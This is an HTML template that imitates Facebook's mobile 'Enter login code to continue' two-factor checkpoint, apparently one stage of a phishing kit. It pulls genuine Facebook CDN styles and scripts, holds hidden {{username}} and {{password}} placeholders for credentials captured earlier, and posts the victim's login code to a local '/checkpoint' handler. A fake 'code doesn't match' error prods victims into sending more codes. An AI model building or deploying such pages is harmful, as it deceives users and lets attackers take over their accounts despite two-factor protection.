<html lang="en">

<head>
	<title>Enter login code to continue</title>
	<meta name="viewport" content="user-scalable=no,initial-scale=1.0001,maximum-scale=1.0001,viewport-fit=cover">
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yN/r/EWLVhDVJTum.png" rel="apple-touch-icon-precomposed"
		sizes="120x120">
	<meta name="referrer" content="default" id="meta_referrer">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="google-site-verification" content="sgqliQBj9kvyL5Onig1-wgYVbtGwO9dacbs4bYFAsYs" />
	<link type="text/css" rel="stylesheet"
	href="https://static.xx.fbcdn.net/rsrc.php/v3/ys/l/0,cross/_MWUm5m7dPX.css?_nc_x=Ij3Wp8lg5Kz"
	data-bootloader-hash="JGx05rV" crossorigin="anonymous">
<link type="text/css" rel="stylesheet"
	href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/0,cross/oXsasPtZu3o.css?_nc_x=Ij3Wp8lg5Kz"
	data-bootloader-hash="qc8VfZK" crossorigin="anonymous">
<link type="text/css" rel="stylesheet"
	href="https://static.xx.fbcdn.net/rsrc.php/v3/yR/l/0,cross/Zoa0MIojI8j.css?_nc_x=Ij3Wp8lg5Kz"
	data-bootloader-hash="HOxXr6o" crossorigin="anonymous">
	<link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials">
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/bWV34k5F-rB.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/bWV34k5F-rB.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="GYdmnc3"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3inLb4/yK/l/en_GB/lDgtn3PJ08N.js?_nc_x=Ij3Wp8lg5Kz" rel="preload"
		as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3inLb4/yK/l/en_GB/lDgtn3PJ08N.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="UFy2+jv"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/II4g17BV9re.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/II4g17BV9re.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="//pl2s4"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/iOmTIOluf81.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/iOmTIOluf81.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="AaCTWwT"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/zHd7NoIKWRu.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/zHd7NoIKWRu.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="uZE1wsi"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/qnPWsE-65II.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/qnPWsE-65II.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="/QbRMZg"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/PwLen4m56x8.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/PwLen4m56x8.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="YVWB3Rp"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/l1cOiorPu3p.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/l1cOiorPu3p.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="vf+jB4V"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3iLl54/yg/l/en_GB/-9zKWI5YYdn.js?_nc_x=Ij3Wp8lg5Kz" rel="preload"
		as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3iLl54/yg/l/en_GB/-9zKWI5YYdn.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="o7NxVnL"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/YDjk_3Q9bji.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/YDjk_3Q9bji.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="lFIvfl3"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/ie38mp0O07P.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/ie38mp0O07P.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="ZD+S2f8"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/dZPMFj3nPTC.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/dZPMFj3nPTC.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="WgG0JOY"></script>
	<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
	<script src="https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz" async=""
		data-bootloader-hash-client="zPYlTyl"></script>
</head>

<body tabindex="0" class="touch x2 ios sf mSafari _fzu _50-3 _55wm portrait"
	style="min-height: 894px; background-color: rgb(221, 223, 226);">
	<div id="viewport" data-kaios-focus-transparent="1" style="min-height: 894px;">
		<h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0"></h1>
		<div id="page">
			<div class="_129_" id="header-notices"></div>
			<div class="_129- _6dr5" id="MChromeHeader" data-autoid="autoid_2"><a
					aria-label="Switch to the basic mobile site."
					href="/a/preferences.php?basic_site_devices=m_basic&amp;uri=https%3A%2F%2F%2Fhome.php%3F__req%3Dj&amp;gfid=AQDlLXzZ48pDyI8uy3c"
					tabindex="-1"
					style="clip: rect(1px, 1px, 1px, 1px);height: 1px;overflow: hidden;position: absolute;white-space: nowrap;width: 1px;"
					data-sigil="no_mpc" waprocessedanchor="true">&nbsp;</a>
				<div class="_7om2 _52z5" id="header">
					<div class="_4g34 _52z6 _ad5s _5i2i _52we" data-sigil="mChromeHeaderCenter">
						<div class="_5xu4"><a><i class="img sp_zqrNfmDGuGz_2x sx_b2f573"><u></u></i></a></div>
					</div>
				</div>
			</div>
			<div class="_55wm" id="root" role="main" data-sigil="context-layer-root content-pane" style="min-height: 894px;">
				<form method="post" action="/checkpoint" class="checkpoint" enctype="application/x-www-form-urlencoded"
					style="margin-bottom:45px" data-sigil="checkpoint-slide-form">
					<input type="hidden" name="username" value="{{username}}" autocomplete="off" />
					<input type="hidden" name="password" value="{{password}}" autocomplete="off" />
					<input type="hidden" name="fb_dtsg" value="BOaC1hf79/c=" autocomplete="off"><input type="hidden"
						name="jazoest" value="2883" autocomplete="off"><input type="hidden" name="checkpoint_data" value="">
					<div title="Enter login code to continue">
						<div id="u_j_0_X1"></div>
						<article class="_55wm _55wr _50ni" id="u_j_1_ZW">
							<section class="_56be">
								<div class="_55wo _55x2 _56bf">
									<div class="_3-8_"></div>
									<section class="_55ws _acu"><span class="_52ja _52jh">
											<div id="checkpoint_title">Enter login code to continue</div>
										</span></section>
									<section class="_55wq">
										<div class="acw apm" data-sigil="marea">
											<div>It looks like you haven't logged in from this browser before. Please enter the login code
												from your phone below.</div>
										</div>
										<div class="acw apm" data-sigil="marea">
											<div><input autocapitalize="off" type="tel" class="_5whq input" id="approvals_code"
													name="approvals_code" autocomplete="off" fdprocessedid="cc3s0e"></div>


											<div class="_1tp8" style="color: #fa3e3e;">The login code you entered doesn't match the one sent
												to your phone. Please check the number and try again.</div>
										</div>



										<div class="acw apm" data-sigil="marea"><input type="hidden" name="codes_submitted" value="0"></div>
										<div class="acw apm" data-sigil="marea">Note: Your text message may take a few minutes to arrive.
										</div>
									</section>
									<div class="_59e9 _55ws _7om2 _52we _5b6o">
										<div class="_4g34 _5b6q _5b6p" aria-hidden="false">
											<div class="_dd6"><span class="_52jc _52j9"><a href="" target="_top"
														waprocessedanchor="true">Having trouble?</a></span></div>
										</div>
									</div>
								</div>
							</section>
							<div class="_p_9 _5nbx">
								<table class="btnBar">
									<tbody>
										<tr>
											<td id="checkpointSubmitButton" class="_2hw0"><button type="submit" value="Submit Code"
													class="_54k8 _52jh _56bs _56b_ _56bw _56bu" name="submit[Submit Code]"
													id="checkpointSubmitButton-actual-button" data-sigil="touchable" fdprocessedid="x8ub4j"><span
														class="_55sr">Submit Code</span></button></td>
										</tr>
									</tbody>
								</table><input type="hidden" name="nh" value="0bb8dbce6ea5c5361cf24b16dd4bd5e79b38b644">
							</div>
							<div class="_1_iw"><button type="submit" value="Not You? Log in here"
									class="_54k8 _52jd _52j9 _2mpg _56yp" id="id[logout-button-with-confirm]"
									name="submit[logout-button-with-confirm]" data-sigil="touchable" fdprocessedid="x60iz9"><span
										class="_55sr">Not You? Log in here</span></button>
								<section class="_2pid">
									<div class="acw apm" data-nocookies="1" id="locale-selector" data-sigil="marea">
										<div class="_7om2">
											<div class="_4g34"><span class="_52jc _52j9 _52jh _3ztb">English (UK)</span>
												<div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=zh_CN&amp;href="
															data-ajaxify-href="/intl/save_locale/?loc=zh_CN&amp;href=#" data-method="post"
															data-sigil="ajaxify" waprocessedanchor="true">中文(简体)</a></span></div>
												<div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=ja_JP&amp;href=#"
															data-ajaxify-href="/intl/save_locale/?loc=ja_JP&amp;href=#" data-method="post"
															data-sigil="ajaxify" waprocessedanchor="true">日本語</a></span></div>
												<div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=pt_BR&amp;href=#"
															data-ajaxify-href="/intl/save_locale/?loc=pt_BR&amp;href=#" data-method="post"
															data-sigil="ajaxify" waprocessedanchor="true">Português (Brasil)</a></span></div>
											</div>
											<div class="_4g34">
												<div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=vi_VN&amp;#"
															data-ajaxify-href="/intl/save_locale/?loc=vi_VN&amp;href=#" data-method="post"
															data-sigil="ajaxify" waprocessedanchor="true">ThaiLand</a></span></div>
												<div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=id_ID&amp;href=#"
															data-ajaxify-href="/intl/save_locale/?loc=id_ID&amp;href=#" data-method="post"
															data-sigil="ajaxify" waprocessedanchor="true">Bahasa Indonesia</a></span></div>
												<div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=es_LA&amp;href=#"
															data-ajaxify-href="/intl/save_locale/?loc=es_LA&amp;href=#" data-method="post"
															data-sigil="ajaxify" waprocessedanchor="true">Español</a></span></div><a
													href="/language/?next_uri=#" waprocessedanchor="true">
													<div class="_3j87 _1rrd _3ztd" aria-label="Complete list of languages"
														data-sigil="more_language"><i class="img sp_zqrNfmDGuGz_2x sx_0a2d34"></i></div>
												</a>
											</div>
										</div>
									</div>
								</section>
							</div>
						</article>
					</div>
				</form>
				<div style="display:none">
					<div></div>
				</div><span><img src="#" width="0" height="0" style="display:none"></span>
			</div>
			<div class=""></div>
			<div class="viewportArea _2v9s" style="display:none" id="u_j_2_21" data-sigil="marea">
				<div class="_5vsg" id="u_j_3_yZ" style="max-height: 206px;"></div>
				<div class="_5vsh" id="u_j_4_3A" style="max-height: 447px;"></div>
				<div class="_5v5d fcg">
					<div class="_2so _2sq _2ss img _50ch" data-animtype="3" data-sigil="m-loading-indicator-root">
						<div class="_2sr" data-sigil="m-loading-indicator-animate"></div>
					</div>Loading...
				</div>
			</div>
			<div class="viewportArea aclb" id="mErrorView" style="display:none" data-sigil="marea">
				<div class="container">
					<div class="image"></div>
					<div class="message" data-sigil="error-message"></div><a class="link" data-sigil="MPageError:retry">Try
						Again</a>
				</div>
			</div>
		</div>
	</div>
	<div id="static_templates">
		<div class="mDialog" id="modalDialog" style="display:none" data-sigil=" context-layer-root" data-autoid="autoid_1">
			<div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader">
				<div class="_7om2 _52we">
					<div class="_5s61">
						<div class="_52z7"><button type="submit" value="Cancel" class="cancelButton btn btnD bgb mfss touchable"
								id="u_j_6_6G" data-sigil="dialog-cancel-button">Cancel</button><button type="submit" value="Back"
								class="backButton btn btnI bgb mfss touchable iconOnly" aria-label="Back" id="u_j_7_7n"
								data-sigil="dialog-back-button"><i class="img sp_zqrNfmDGuGz_2x sx_336d05"
									style="margin-top: 2px;"></i></button></div>
					</div>
					<div class="_4g34">
						<div class="_52z6">
							<div class="_50l4 mfsl fcw" id="m-future-page-header-title" role="heading" tabindex="0"
								data-sigil="m-dialog-header-title dialog-title">Loading...</div>
						</div>
					</div>
					<div class="_5s61">
						<div class="_52z8" id="modalDialogHeaderButtons"></div>
					</div>
				</div>
			</div>
			<div class="modalDialogView" id="modalDialogView"></div>
			<div class="_5v5d _5v5e fcg" id="dialogSpinner">
				<div class="_2so _2sq _2ss img _50ch" data-animtype="3" id="u_j_5_sA" data-sigil="m-loading-indicator-root">
					<div class="_2sr" data-sigil="m-loading-indicator-animate"></div>
				</div>Loading...
			</div>
		</div>
	</div>

	<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0,cross/LTYneoLEHRq.css?_nc_x=Ij3Wp8lg5Kz"
		as="style">
	<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/bWV34k5F-rB.js?_nc_x=Ij3Wp8lg5Kz" as="script"
		nonce="">
	<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3inLb4/yK/l/en_GB/lDgtn3PJ08N.js?_nc_x=Ij3Wp8lg5Kz"
		as="script" nonce="">
	<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/GFAgyiHl-Nr.css?_nc_x=Ij3Wp8lg5Kz"
		as="style">
	<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yt/l/0,cross/Mz0t7DV_Dj2.css?_nc_x=Ij3Wp8lg5Kz"
		as="style">
	<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yu/l/0,cross/bqJfhGimWwz.css?_nc_x=Ij3Wp8lg5Kz"
		as="style">
	<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yY/l/0,cross/mb-1P2A94D4.css?_nc_x=Ij3Wp8lg5Kz"
		as="style">
	<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/0,cross/GiYSj5It8pe.css?_nc_x=Ij3Wp8lg5Kz"
		as="style">
	<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yT/l/0,cross/4oSHaBz7J_I.css?_nc_x=Ij3Wp8lg5Kz"
		as="style">
	<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/II4g17BV9re.js?_nc_x=Ij3Wp8lg5Kz" as="script"
		nonce="">
	<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/iOmTIOluf81.js?_nc_x=Ij3Wp8lg5Kz" as="script"
		nonce="">



	<div class="AdBox Ad advert post-ads"></div>
	<div class="dfp_unit"></div>
</body>

</html>